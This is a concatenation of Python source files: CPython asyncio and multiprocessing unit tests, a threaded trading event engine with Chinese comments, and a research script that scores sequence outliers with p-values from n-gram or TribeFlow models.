h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
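    # Subclasses plug in either the pure-Python (events._py_*) or the
    # C-accelerated (events._c_*) implementations of these hooks; setUp() swaps
    # the chosen variant into both the events module and the top-level asyncio
    # namespace so every code path under test uses the same implementation.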
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
eventEngine.py
|
# encoding: UTF-8
'''
VNPY originally shipped two versions of its event engine: one driven by a QTimer
and one driven by a child thread. The child-thread version is used here.
'''
# Standard library imports
from queue import Queue, Empty
from threading import Thread
from collections import defaultdict
from time import sleep
EVENT_TIMER = 'eTimer'
########################################################################
class EventEngine(object):
"""
计时器使用python线程的事件驱动引擎
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
# __generalHandlers是一个列表,用来保存通用回调函数(所有事件均调用)
self.__generalHandlers = []
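        # For illustration only (the event types and handler names here are
        # hypothetical), the two structures end up shaped like:
        #   self.__handlers        == {'eTimer': [onTimer], 'eTick': [onTick, logTick]}
        #   self.__generalHandlers == [logEverything]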
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timerActive = True
self.__timer.start()
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
        self.type_ = type_      # event type
        self.dict_ = {}         # dict holding the event's payload data
#----------------------------------------------------------------------
# Running this script directly performs a quick self-test
if __name__ == '__main__':
def test():
"""测试函数"""
from datetime import datetime
def simpletest(event):
print(u'处理每秒触发的计时器事件:%s' % str(datetime.now()))
ee = EventEngine()
ee.register(EVENT_TIMER, simpletest)
ee.start()
test()
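# A minimal usage sketch in addition to the timer demo above. The event type
# 'eOrder', the handler and the payload below are made-up names used purely for
# illustration; only the EventEngine/Event API defined in this module is assumed.
def usage_sketch():
    """Register a handler for a custom event type and push one event through the engine."""
    def onOrder(event):
        print(u'order received: %s' % event.dict_)
    ee = EventEngine()
    ee.register('eOrder', onOrder)
    ee.start()
    evt = Event(type_='eOrder')
    evt.dict_['orderID'] = '0001'   # arbitrary payload
    ee.put(evt)
    sleep(2)                        # give the worker thread time to dispatch the event
    ee.stop()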
|
outlierDetection.py
|
# -*- coding: utf-8 -*-
'''
Created on Aug 9, 2016
@author: zahran
'''
#from __future__ import division, print_function
from scipy.stats import chisquare
from collections import OrderedDict
from multiprocessing import Process, Queue
import pandas as pd
#import plac
import numpy as np
import math
import os.path
from MyEnums import *
from TestSample import *
from bokeh.colors import gold
from DetectionTechnique import *
'''
CORES = 1
PATH = '/Users/mohame11/Documents/myFiles/Career/Work/Purdue/PhD_courses/projects/tribeflow_outlierDetection/pins_repins_fixedcat/'
RESULTS_PATH = PATH+'sim_Pvalues/'
MODEL_PATH = PATH+'pins_repins_win10_noop_NoLeaveOut.h5'
TRACE_PATH = PATH + 'pins_repins_win10.trace'
SEQ_FILE_PATH = PATH+'simData_perUser5'
STAT_FILE = PATH+'catStats'
UNBIAS_CATS_WITH_FREQ = False
HISTORY_SIZE = 4
smoothingParam = 1.0 #smoothing parameter for unbiasing item counts.
seq_prob = SEQ_PROB.NGRAM
useWindow = USE_WINDOW.FALSE
'''
CORES = 1
PATH = '/Users/mohame11/Documents/myFiles/Career/Work/Purdue/PhD_courses/projects/outlierDetection/pins_repins_fixedcat/win4/'
RESULTS_PATH = PATH+'temp_pvalues/'
MODEL_PATH = PATH+'pins_repins_forLM_4gram.arpa'
TRACE_PATH = PATH + 'pins_repins_win10.trace'
SEQ_FILE_PATH = PATH+'simulatedData_4gram'
STAT_FILE = PATH+'catStats'
UNBIAS_CATS_WITH_FREQ = False
HISTORY_SIZE = 3
smoothingParam = 1.0 #smoothing parameter for unbiasing item counts.
seq_prob = SEQ_PROB.NGRAM
useWindow = USE_WINDOW.FALSE
DATA_HAS_USER_INFO = False #has no effect on tribeflow
VARIABLE_SIZED_DATA = True #has no effect on tribeflow
def getPvalueWithoutRanking(currentActionRank, keySortedProbs, probabilities):
#normConst = 0.0
#for i in range(len(probabilities)):
# normConst += probabilities[i]
cdf = 0.0
for i in range(currentActionRank+1):
cdf += probabilities[keySortedProbs[i]]
#prob = cdf/normConst
return cdf
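# A hedged, hand-checkable illustration (not part of the original pipeline) of the
# CDF-style p-value above. The numbers are invented; only getPvalueWithoutRanking
# and the same ascending-by-probability sort used in outlierDetection() are assumed.
def _example_pvalue_without_ranking():
    probabilities = {0: 0.5, 1: 0.3, 2: 0.2}    # action index -> probability
    keySortedProbs = sorted(probabilities, key=lambda k: (-probabilities[k], k), reverse=True)
    # keySortedProbs == [2, 1, 0]; the observed action 1 therefore has rank 1 and
    # its p-value is P(action 2) + P(action 1) = 0.2 + 0.3 = 0.5
    currentActionRank = keySortedProbs.index(1)
    return getPvalueWithoutRanking(currentActionRank, keySortedProbs, probabilities)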
#testDic, quota, coreId, q, store, true_mem_size, hyper2id, obj2id, Theta_zh, Psi_sz, smoothedProbs
def outlierDetection(coreTestDic, quota, coreId, q, myModel):
myCnt = 0
writer = open(RESULTS_PATH+'/outlier_analysis_pvalues_'+str(coreId),'w')
for user in coreTestDic:
for testSample in coreTestDic[user]:
myCnt += 1
seq = testSample.actions
goldMarkers = testSample.goldMarkers
#actions = myModel.obj2id.keys()
actions = myModel.getAllPossibleActions()
pValuesWithRanks = {}
pValuesWithoutRanks = {}
for i in range(len(seq)): #for all actions in the sequence.
#Take the action with index i and replace it with all possible actions
probabilities = {}
scores = {}
newSeq = list(seq)
#currentActionId = myModel.obj2id[newSeq[i]] #current action id
currentActionIndex = actions.index(newSeq[i])# the current action index in the action list.
#cal scores (an un-normalized sequence prob in tribeflow)
normalizingConst = 0
for j in range(len(actions)): #for all possible actions that can replace the current action
del newSeq[i]
newSeq.insert(i, actions[j])
userId = myModel.getUserId(user)
seqScore = myModel.getProbability(userId, newSeq)
scores[j] = seqScore
normalizingConst += seqScore
#cal probabilities
                if(normalizingConst <= 0.0): #the scores sum to an effectively zero probability mass
break
for j in range(len(actions)): #for all possible actions that can replace the current action
probabilities[j] = float(scores[j])/float(normalizingConst)
#sorting ascendingly
keySortedProbs = sorted(probabilities, key=lambda k: (-probabilities[k], k), reverse=True)
currentActionRank = keySortedProbs.index(currentActionIndex)
currentActionPvalueWithoutRanks = getPvalueWithoutRanking(currentActionRank, keySortedProbs, probabilities)
currentActionPvalueWithRanks = float(currentActionRank+1)/float(len(actions))
pValuesWithRanks[i] = currentActionPvalueWithRanks
pValuesWithoutRanks[i] = currentActionPvalueWithoutRanks
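                # Two p-value flavors are recorded per position: a rank-based one,
                # (rank + 1) / |actions|, and a probability-mass one, i.e. the CDF over
                # all candidate actions that are no more likely than the observed action.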
if(len(seq) == len(pValuesWithoutRanks)):
writer.write('user##'+str(user)+'||seq##'+str(seq)+'||PvaluesWithRanks##'+str(pValuesWithRanks)+'||PvaluesWithoutRanks##'+str(pValuesWithoutRanks)+'||goldMarkers##'+str(goldMarkers)+'\n')
if(myCnt%100 == 0):
writer.flush()
print('>>> proc: '+ str(coreId)+' finished '+ str(myCnt)+'/'+str(quota)+' instances ...')
writer.close()
#ret = [chiSqs, chiSqs_expected]
#q.put(ret)
def distributeOutlierDetection():
myModel = None
if(seq_prob == SEQ_PROB.NGRAM):
myModel = NgramLM()
myModel.useWindow = useWindow
myModel.model_path = MODEL_PATH
myModel.true_mem_size = HISTORY_SIZE
myModel.SEQ_FILE_PATH = SEQ_FILE_PATH
myModel.DATA_HAS_USER_INFO = DATA_HAS_USER_INFO
myModel.VARIABLE_SIZED_DATA = VARIABLE_SIZED_DATA
myModel.loadModel()
if(seq_prob == SEQ_PROB.TRIBEFLOW):
myModel = TribeFlow()
myModel.useWindow = useWindow
myModel.model_path = MODEL_PATH
myModel.store = pd.HDFStore(MODEL_PATH)
myModel.Theta_zh = myModel.store['Theta_zh'].values
myModel.Psi_sz = myModel.store['Psi_sz'].values
myModel.true_mem_size = myModel.store['Dts'].values.shape[1]
myModel.hyper2id = dict(myModel.store['hyper2id'].values)
myModel.obj2id = dict(myModel.store['source2id'].values)
#myModel.trace_fpath = myModel.store['trace_fpath'][0][0]
myModel.trace_fpath = TRACE_PATH
myModel.UNBIAS_CATS_WITH_FREQ = UNBIAS_CATS_WITH_FREQ
myModel.STAT_FILE = STAT_FILE
myModel.SEQ_FILE_PATH=SEQ_FILE_PATH
myModel.DATA_HAS_USER_INFO = DATA_HAS_USER_INFO
myModel.VARIABLE_SIZED_DATA = VARIABLE_SIZED_DATA
if(UNBIAS_CATS_WITH_FREQ):
print('>>> calculating statistics for unbiasing categories ...')
myModel.calculatingItemsFreq(smoothingParam)
testDic,testSetCount = myModel.prepareTestSet()
print('Number of test samples: '+str(testSetCount))
myProcs = []
idealCoreQuota = testSetCount // CORES
    userList = list(testDic.keys())
uid = 0
q = Queue()
for i in range(CORES):
coreTestDic = {}
coreShare = 0
while uid < len(userList):
coreShare += len(testDic[userList[uid]])
coreTestDic[userList[uid]] = testDic[userList[uid]]
uid += 1
if(coreShare >= idealCoreQuota):
#p = Process(target=outlierDetection, args=(coreTestDic, coreShare, i, q, myModel))
outlierDetection(coreTestDic, coreShare, i, q, myModel)
#myProcs.append(p)
testSetCount -= coreShare
leftCores = (CORES-(i+1))
if(leftCores >0):
idealCoreQuota = testSetCount // leftCores
print('>>> Starting process: '+str(i)+' on '+str(coreShare)+' samples.')
#p.start()
break
#myProcs.append(p)
    for i, p in enumerate(myProcs):
        p.join()
        print('>>> process: '+str(i)+' finished')
#results = []
#for i in range(CORES):
# results.append(q.get(True))
print('\n>>> All DONE!')
#store.close()
def main():
distributeOutlierDetection()
if __name__ == "__main__":
main()
#cProfile.run('distributeOutlierDetection()')
#plac.call(main)
print('DONE!')
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import pickle
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False     # setting this to True makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
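# Hedged usage sketch (not exercised by the test classes below): wrap a callable,
# invoke it, then read the elapsed wall-clock time from .elapsed. time.sleep is
# only an illustrative stand-in for a slow call.
def _example_timing_wrapper():
    timed_sleep = TimingWrapper(time.sleep)
    timed_sleep(0.01)
    return timed_sleep.elapsed      # roughly 0.01 seconds, possibly a bit more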
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
    # For the sanity of Windows users: refuse to pickle a test case instead
    # of crashing or freezing in multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
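    # Try the public accessor first, then fall back to the private attributes
    # used by threading and multiprocessing semaphore implementations.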
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
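# Callable passed to Process(target=...) by test_lose_target_ref to check
# that the parent process drops its reference to the target.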
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
